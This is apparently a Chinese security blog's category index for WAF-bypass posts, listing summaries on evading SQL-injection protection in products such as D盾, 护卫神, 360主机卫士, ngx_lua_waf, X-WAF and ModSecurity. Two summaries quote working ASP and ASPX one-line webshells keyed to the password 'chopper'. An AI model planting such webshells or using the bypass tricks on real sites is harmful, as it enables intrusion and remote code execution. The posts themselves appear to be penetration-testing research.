随笔分类 -  16-WAF Bypass

WAF绕过、Bypass
摘要:在WAF防护逐渐盛行的前几年,我曾研究过各种WAF绕过的技巧,也曾突破过各种各样的WAF防护。最近,准备重新梳理下自己的知识体系,于是,我将自己写过的关于WAF攻防相关的文章内容合并到一个文档,并形成一个完整目录。 这份文档分为技巧篇和实战篇,技巧篇介绍了各种服务器、数据库、应用层、WAF层的特性, 阅读全文
posted @ 2020-03-30 21:40 Bypass 阅读(1529) 评论(0) 推荐(0) 编辑
摘要:​ 梳理了一下自己写过的WAF Bypass相关的文章,按照编写时间顺序,整理成了一个WAF Bypass实战系列,如果你准备了解WAF攻防这一块的内容,可以来了解一下。 第一篇:《BypassD盾IIS防火墙SQL注入防御(多姿势)》 原文地址:http://www.cnblogs.com/xia 阅读全文
posted @ 2018-06-10 23:27 Bypass 阅读(3711) 评论(0) 推荐(0) 编辑
摘要:0x00 前言 ​ 护卫神一直专注服务器安全领域, 其中有一款产品,护卫神·入侵防护系统 ,提供了一些网站安全防护的功能,在IIS加固模块中有一个SQL防注入功能。 这边主要分享一下几种思路,Bypass 护卫神SQL注入防御。 0x01 环境搭建 护卫神官网:http://www.huweishe 阅读全文
posted @ 2018-06-06 09:33 Bypass 阅读(1425) 评论(0) 推荐(0) 编辑
摘要:0x00 前言 ​ ngx_lua_waf是一款基于ngx_lua的web应用防火墙,使用简单,高性能、轻量级。默认防御规则在wafconf目录中,摘录几条核心的SQL注入防御规则: 这边主要分享三种另类思路,Bypass ngx_lua_waf SQL注入防御。 0x01 环境搭建 github源 阅读全文
posted @ 2018-06-05 09:36 Bypass 阅读(1561) 评论(0) 推荐(2) 编辑
摘要:原文首发于安全客,原文链接:https://www.anquanke.com/post/id/103771 0x00 前言 ​ OpenResty® 是一个基于 Nginx 与 Lua 的高性能 Web 平台,其内部集成了大量精良的 Lua 库、第三方模块以及大多数的依赖项。 OpenResty官网 阅读全文
posted @ 2018-06-04 12:43 Bypass 阅读(842) 评论(0) 推荐(0) 编辑
摘要:0x00 前言 在服务器客户端领域,曾经出现过一款360主机卫士,目前已停止更新和维护,官网都打不开了,但服务器中依然经常可以看到它的身影。从半年前的测试虚拟机里面,翻出了360主机卫士Apache版的安装包,就当做是一个纪念版吧。这边主要分享一下几种思路,Bypass 360主机卫士SQL注入防御 阅读全文
posted @ 2018-06-04 12:33 Bypass 阅读(2566) 评论(1) 推荐(1) 编辑
摘要:0x00 前言 ​ X-WAF是一款适用中、小企业的云WAF系统,让中、小企业也可以非常方便地拥有自己的免费云WAF。 ​ 本文从代码出发,一步步理解WAF的工作原理,多姿势进行WAF Bypass。 0x01 环境搭建 官网:https://waf.xsec.io github源码:https:/ 阅读全文
posted @ 2018-06-04 11:19 Bypass 阅读(2102) 评论(0) 推荐(1) 编辑
摘要:ModSecurity 是一款开源Web应用防火墙,支持Apache/Nginx/IIS,可作为服务器基础安全设施,还是不错的选择。 系统环境:window 2008 R2+IIS 7 0X01 ModSecurity安装 ModSecurity 下载地址:http://www.modsecurit 阅读全文
posted @ 2017-11-27 17:20 Bypass 阅读(5601) 评论(0) 推荐(0) 编辑
摘要:0x01 前言 之前发了一篇博客《Bypass D盾_IIS防火墙SQL注入防御(多姿势)》,D哥第一时间联系我,对问题进行修复。这段时间与D哥聊了挺多关于D盾这款产品的话题,实在是很佩服,对这样一款产品的细致以及投入。一个人,一款产品,一路走来,弥足艰辛。旧版D盾_防火墙支持win2003,新版D 阅读全文
posted @ 2017-10-28 11:06 Bypass 阅读(688) 评论(0) 推荐(0) 编辑
摘要:0x01 前言 在一些网站通常会在公用文件引入全局防护代码进行SQL注入、XSS跨站脚本等漏洞的防御,在一定程度上对网站安全防护还是比较有效的。 这里讨论一下关键字过滤不完善及常见正则匹配存在的问题,并收集了网络上常见的PHP全局防护代码进行分析。 Bypass思路:只考虑关键字被过滤如何进行Byp 阅读全文
posted @ 2017-10-24 14:39 Bypass 阅读(5984) 评论(0) 推荐(0) 编辑
摘要:aspx木马收集: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%> 随日期变化的连接密码, Asp.NET服务端写法: <%@ Page Language="Jscript"%><%eval(Reque 阅读全文
posted @ 2017-09-21 09:18 Bypass 阅读(26187) 评论(0) 推荐(0) 编辑
摘要:ASP一句话木马收集: <%eval request("chopper")%> <%execute request("chopper")%> <%execute(request("chopper"))%> <%ExecuteGlobal request("chopper")%> <%Eval(Req 阅读全文
posted @ 2017-09-20 13:08 Bypass 阅读(47328) 评论(0) 推荐(0) 编辑
摘要:0X01 前言 D盾_IIS防火墙,目前只支持Win2003服务器,前阵子看见官方博客说D盾新版将近期推出,相信功能会更强大,这边分享一下之前的SQL注入防御的测试情况。D盾_IIS防火墙注入防御策略,如下图,主要防御GET/POST/COOKIE,文件允许白名单设置。构造不同的测试环境,IIS+( 阅读全文
posted @ 2017-09-14 10:59 Bypass 阅读(8703) 评论(1) 推荐(0) 编辑
摘要:X-WAF 最近才关注到的一款云WAF,花了一些时间搭建了一个环境,并做了一些测试,感觉比较适合新手来练习WAF Bypass。 X-WAF是一款适用中、小企业的云WAF系统,让中、小企业也可以非常方便地拥有自己的免费云WAF。 官网:https://waf.xsec.io/ 源码:https:// 阅读全文
posted @ 2017-08-27 14:48 Bypass 阅读(1373) 评论(0) 推荐(0) 编辑
摘要:0x01 前言 一直在思考如何编写一个自动化注入工具,这款工具不用太复杂,但是可以用最简单、最直接的方式来获取数据库信息,根据自定义构造的payload来绕过防护,这样子就可以。 0x02 SQL注入工具 A、联合查询 union select 实现起来最为简单,报错注入的实现方式也基本一致,主要思 阅读全文
posted @ 2017-08-03 15:20 Bypass 阅读(5262) 评论(0) 推荐(0) 编辑
摘要:0x01 前言 在测试过程中,经常会遇到一些主机防护软件,对这方面做了一些尝试,可成功bypass了GET和POST的注入防御,分享一下姿势。 0x02 环境搭建 Windows Server 2003+phpStudy sql注入点测试代码: sql.php 运行效果: 0x03 Bypass 过 阅读全文
posted @ 2017-08-03 11:15 Bypass 阅读(8983) 评论(2) 推荐(0) 编辑
摘要:ngx_lua_waf ngx_lua_waf是一个基于lua-nginx-module(openresty)的web应用防火墙 源码:https://github.com/loveshell/ngx_lua_waf 安装部署 系统版本:Centos6.5 x86_64 1、openresty的配置 阅读全文
posted @ 2017-07-07 16:06 Bypass 阅读(684) 评论(0) 推荐(0) 编辑
摘要:0x01 背景 无聊,测试了一下access特性 0x02 测试 常见有5个位置即:select * from admin where id=1【位置一】union【位置二】select【位置三】1,2,db_name()【位置四】from【位置五】admin 位置一:参数和union之间的位置 ( 阅读全文
posted @ 2017-07-03 11:15 Bypass 阅读(725) 评论(0) 推荐(0) 编辑
摘要:0x01 背景 探索玩了Mysql特性,继续来探索一下MSsql特性。 0x02 测试 常见有5个位置即:select * from admin where id=1【位置一】union【位置二】select【位置三】1,2,db_name()【位置四】from【位置五】admin 位置一:参数和u 阅读全文
posted @ 2017-07-02 17:17 Bypass 阅读(1203) 评论(0) 推荐(0) 编辑
摘要:0x01 背景 Mysql数据库特性探索,探索能够绕过WAF的数据库特性。 0x02 测试 常见有5个位置即: SELECT * FROM admin WHERE username = 1【位置一】union【位置二】select【位置三】1,user()【位置四】from【位置五】admin 位置 阅读全文
posted @ 2017-07-02 17:15 Bypass 阅读(1064) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示